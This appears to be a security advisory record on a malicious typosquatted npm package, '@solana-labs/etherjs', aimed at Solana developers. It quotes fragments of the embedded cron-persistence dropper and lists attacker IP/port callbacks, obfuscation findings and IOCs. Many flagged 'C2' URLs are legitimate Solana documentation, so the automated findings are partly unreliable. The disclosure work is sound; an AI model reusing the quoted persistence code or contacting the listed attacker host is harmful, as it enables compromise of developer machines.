VDB
GCVE-110-OSM-2026-5507
GCVE-110-OSM-2026-5507
Advisory PublishedCVSS 9.6/10
This is a typosquatting supply-chain attack impersonating the legitimate `@solana` namespace. The fake, copycat scoped namespace `@solana-labs` is published by a throwaway account (`tihiwa5354@bncinema.com`) that also controls seven other Solana-themed squats. The clearest smoking gun is the cron persistence dropper embedded in both `lib/index.cjs.js` and `lib/index.esm.js`: `writeFileSync(tf,cr); cp.execSync('(crontab -l 2>/dev/null|grep -v csync;cat '+tf+')|crontab -', {timeout:3000}); fs.unlink(...)` — a textbook download-execute-delete pattern that writes an attacker-controlled cron payload and installs it silently. Accompanying this is active system fingerprinting via `os.userInfo()` and `os.hostname()`, public IP resolution via `ifconfig.me`, and HTTP callbacks to the hardcoded attacker IP `104.239.66.223:8899`. XOR-encoded byte arrays (`var t=[93,108,109,124,...]`) obfuscate strings that likely include the C2 address or additional payload URL, consistent with the 'obfuscated-exfil' combo flagged by the static analyzer. The 17-version publishing burst across a single day, fake maintainer email, and publisher-controlled typosquat cluster confirm adversarial intent targeting Solana developers.
**IOCs**
- Domain: `bncinema.com`
- URL: `https://104.239.66.223:8899`
- IP: `104.239.66.223`
ENTRY
lib/index.cjs.js (main: lib/index.cjs.js)
PERSISTENCE
- Cron Job Persistence in lib/index.cjs.js: "crontab -"
- Cron Job Persistence in lib/index.esm.js: "crontab -"
DESTINATION
- custom-c2: https://bargsten.org/jsts/enums/ (primary, plaintext) in lib/index.browser.cjs.js
- custom-c2: https://docs.solana.com/implemented-proposals/ed_overview (plaintext) in lib/index.browser.cjs.js
- custom-c2: https://api.testnet.solana.com (plaintext) in lib/index.browser.cjs.js
- custom-c2: https://docs.rs/solana-stake-program/latest/solana_stake_program/stake_state/enum.StakeStateV2.html (plaintext) in lib/index.browser.cjs.js
- custom-c2: https://docs.rs/solana-vote-program/1.9.5/solana_vote_program/vote_state/struct.VoteState.html#method.size_of (plaintext) in lib/index.browser.cjs.js
- custom-c2: http://api.devnet.solana.com (plaintext) in lib/index.browser.cjs.js
- custom-c2: http://api.testnet.solana.com (plaintext) in lib/index.browser.cjs.js
- custom-c2: http://api.mainnet-beta.solana.com/ (plaintext) in lib/index.browser.cjs.js
(+51 more)
EXFIL
- Corporate Environment Targeting in lib/index.iife.js: "tmost min(nBitLen, outLen) bits, which match"
- Data Encoding for Exfiltration in lib/index.browser.cjs.js: "Buffer.from(wireTransaction).toString('base64')"
- Data Encoding for Exfiltration in lib/index.browser.esm.js: "Buffer.from(wireTransaction).toString('base64')"
- Data Encoding for Exfiltration in lib/index.cjs.js: "Buffer.from(wireTransaction).toString('base64')"
- Data Encoding for Exfiltration in lib/index.esm.js: "Buffer.from(wireTransaction).toString('base64')"
- Data Encoding for Exfiltration in lib/index.iife.js: "Buffer.from(wireTransaction).toString('base64')"
- Data Encoding for Exfiltration in lib/index.native.js: "Buffer.from(wireTransaction).toString('base64')"
- Network Request in lib/index.cjs.js: "https.get("
(+5 more)
OBFUSCATION
- Obfuscation: function to array replacements in lib/index.iife.js
- String Array Obfuscation in lib/index.iife.js: "[ '0x428a2f98d728ae22', '0x7137449123ef65cd', '0xb5c0fbcfec4d3b2f', '0xe9b5dba58..."
- Decoded Base64 Content in lib/index.cjs.js
- Decoded Base64 Content in lib/index.esm.js
- Decoded Base64 Content in lib/index.esm.js
- Decoded Base64 Content in lib/index.esm.js
- Obfuscation Pattern: charCodeChain in lib/index.iife.js: "charCodeAt(i)"
- Deobfuscation Skipped (safety guard) in lib/index.browser.cjs.js
(+5 more)
ADDITIONAL FINDINGS
- Download Execute Delete Pattern in lib/index.cjs.js: "writeFileSync(tf,cr);cp.execSync('(crontab -l 2>/dev/null|grep -v csync;cat '+tf..."
- Dynamic Code Execution in lib/index.cjs.js: "exec( str )"
- Shell Command Execution in lib/index.cjs.js: "require('child_process')"
- XOR-Encoded String Arrays in lib/index.cjs.js: "var t=[93,108,109,124,121,113,123,122,89,81,61,82,71,70,69,65,84,71,60,88,71,67,..."
- Brand New Package
- Publisher Has Other Malicious Packages
(+1 more)
PAYLOAD FILES
lib/index.esm.js (+ lib/index.cjs.js)
INDICATORS (IOCs)
- urls: https://api.mainnet-beta.solana.com, https://docs.solana.com, https://bargsten.org/jsts/enums/\nexport, https://api.testnet.solana.com\, https://docs.rs/solana-stake-program/latest/solana_stake_program/stake_state/enum.StakeStateV2.html\n (+14 more)
- domains: api.mainnet-beta.solana.com, docs.solana.com, solana.com, keybase.io, ristretto.group (+4 more)
- emails: dead_horse@qq.com, maintainers@solanalabs.com
- sha256Hashes: 0100000000000000000000000000000000000000000000000000000000000000, c7176a703d4dd84fba3c0b760d10670f2a2053fa2c39ccc64ec7fd7792ac037a, 0000000000000000000000000000000000000000000000000000000000000080, 26e8958fc2b227b045c3f489f2ef98f0d5dfac05d3c63339b13802886d53fc05, ecffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff7f (+3 more)
- payloadFileHash: 6c0fffa159f7b4a14d32ea72f3acd9efaca19d582d8b0e33a80bf6608867df08
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | @solana-labs/etherjs | 1.98.112 (affected) | — |
Browse GCVE Records
72,664 records in the GCVE database · Updated July 15, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.